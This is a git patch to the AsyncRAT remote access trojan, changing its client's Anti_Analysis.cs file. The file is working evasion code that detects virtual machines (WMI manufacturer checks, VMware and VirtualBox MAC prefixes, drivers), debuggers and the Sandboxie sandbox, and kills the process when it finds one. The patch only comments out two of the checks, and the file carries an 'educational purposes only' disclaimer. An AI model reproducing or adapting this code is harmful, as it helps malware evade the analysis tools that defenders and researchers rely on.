From 34c8a05752398e8b877223333e0c4711eb28579e Mon Sep 17 00:00:00 2001 From: MrDevBot Date: Tue, 21 May 2019 19:35:37 +1000 Subject: [PATCH] Commented out Unimplemented methods Will probably add these methods at a later date once they have been updated to work with this version --- AsyncRAT-C#/Client/Helper/Anti_Analysis.cs | 236 ++++++++++----------- 1 file changed, 118 insertions(+), 118 deletions(-) diff --git a/AsyncRAT-C#/Client/Helper/Anti_Analysis.cs b/AsyncRAT-C#/Client/Helper/Anti_Analysis.cs index 6cb7520..076a687 100644 --- a/AsyncRAT-C#/Client/Helper/Anti_Analysis.cs +++ b/AsyncRAT-C#/Client/Helper/Anti_Analysis.cs @@ -1,7 +1,7 @@ -using System; -using System.Diagnostics; +using System; +using System.Diagnostics; using System.Linq; -using System.Management; +using System.Management; using System.Net.NetworkInformation; using System.Runtime.InteropServices; @@ -12,125 +12,125 @@ using System.Runtime.InteropServices; // This program is distributed for educational purposes only. - - -namespace Client.Helper -{ - - class Anti_Analysis + + +namespace Client.Helper +{ + + class Anti_Analysis { - private static long GB_50 = 50000000000; - public static void RunAntiAnalysis() - { - if (DetectVirtualMachine() || DetectDebugger() || DetectSandboxie()) - Environment.FailFast(null); + private static long GB_50 = 50000000000; + public static void RunAntiAnalysis() + { + if (DetectVirtualMachine() || DetectDebugger() || DetectSandboxie()) + Environment.FailFast(null); } - internal static bool SmallHDD() - { - - // Method One - main drive smaller than 50gb, likely a VM - long driveSize = Methods.GetMainDriveSize(); - if (driveSize <= GB_50 * 2) - return true; - - // Method Two - has common card of virtual machine - if (HasVMCard()) - return true; - - // Method Three - checks for vm drivers - if (HasVBOXDriver()) - return true; - - // Method Four - if machine has been on for less than 5 mins - if (GetUptime() < TimeSpan.FromMinutes(5)) + internal static bool SmallHDD() + { + + // Method One - main drive smaller than 50gb, likely a VM + long driveSize = Methods.GetMainDriveSize(); + if (driveSize <= GB_50 * 2) return true; + // Method Two - has common card of virtual machine + //if (HasVMCard()) + //return true; + + // Method Three - checks for vm drivers + if (HasVBOXDriver()) + return true; + + // Method Four - if machine has been on for less than 5 mins + //if (GetUptime() < TimeSpan.FromMinutes(5)) + //return true; + // Method Five - has VM mac address - if (HasVMMac()) - return true; - - return false; + if (HasVMMac()) + return true; + + return false; } - private static bool HasVMMac() - { - var macAddr = - ( - from nic in NetworkInterface.GetAllNetworkInterfaces() - where nic.OperationalStatus == OperationalStatus.Up - select nic.GetPhysicalAddress().ToString() - ).FirstOrDefault(); - - var macs = new[] - { - "00-05-69", - "00:05:69", - "000569", - "00-50-56", - "00:50:56", - "005056", - "00-0C-29", - "00:0C:29", - "000C29", - "00-1C-14", - "00:1C:14", - "001C14", - "08-00-27", - "08:00:27", - "080027", - }; - foreach (string mac in macs) - { - if (mac == macAddr) - return true; - } - return false; - } - - - - - private static bool DetectVirtualMachine() - { - using (var searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem")) - { - using (var items = searcher.Get()) - { - foreach (var item in items) - { - string manufacturer = item["Manufacturer"].ToString().ToLower(); - if ((manufacturer == "microsoft corporation" && item["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL")) - || manufacturer.Contains("vmware") - || item["Model"].ToString() == "VirtualBox") - { - return true; - } - } - } - } - return false; - } - - private static bool DetectDebugger() - { - bool isDebuggerPresent = false; - CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebuggerPresent); - return isDebuggerPresent; - } - - private static bool DetectSandboxie() - { - if (GetModuleHandle("SbieDll.dll").ToInt32() != 0) - return true; - else - return false; - } - - - [DllImport("kernel32.dll")] - public static extern IntPtr GetModuleHandle(string lpModuleName); - - [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] - static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent); - } -} + private static bool HasVMMac() + { + var macAddr = + ( + from nic in NetworkInterface.GetAllNetworkInterfaces() + where nic.OperationalStatus == OperationalStatus.Up + select nic.GetPhysicalAddress().ToString() + ).FirstOrDefault(); + + var macs = new[] + { + "00-05-69", + "00:05:69", + "000569", + "00-50-56", + "00:50:56", + "005056", + "00-0C-29", + "00:0C:29", + "000C29", + "00-1C-14", + "00:1C:14", + "001C14", + "08-00-27", + "08:00:27", + "080027", + }; + foreach (string mac in macs) + { + if (mac == macAddr) + return true; + } + return false; + } + + + + + private static bool DetectVirtualMachine() + { + using (var searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem")) + { + using (var items = searcher.Get()) + { + foreach (var item in items) + { + string manufacturer = item["Manufacturer"].ToString().ToLower(); + if ((manufacturer == "microsoft corporation" && item["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL")) + || manufacturer.Contains("vmware") + || item["Model"].ToString() == "VirtualBox") + { + return true; + } + } + } + } + return false; + } + + private static bool DetectDebugger() + { + bool isDebuggerPresent = false; + CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebuggerPresent); + return isDebuggerPresent; + } + + private static bool DetectSandboxie() + { + if (GetModuleHandle("SbieDll.dll").ToInt32() != 0) + return true; + else + return false; + } + + + [DllImport("kernel32.dll")] + public static extern IntPtr GetModuleHandle(string lpModuleName); + + [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] + static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent); + } +}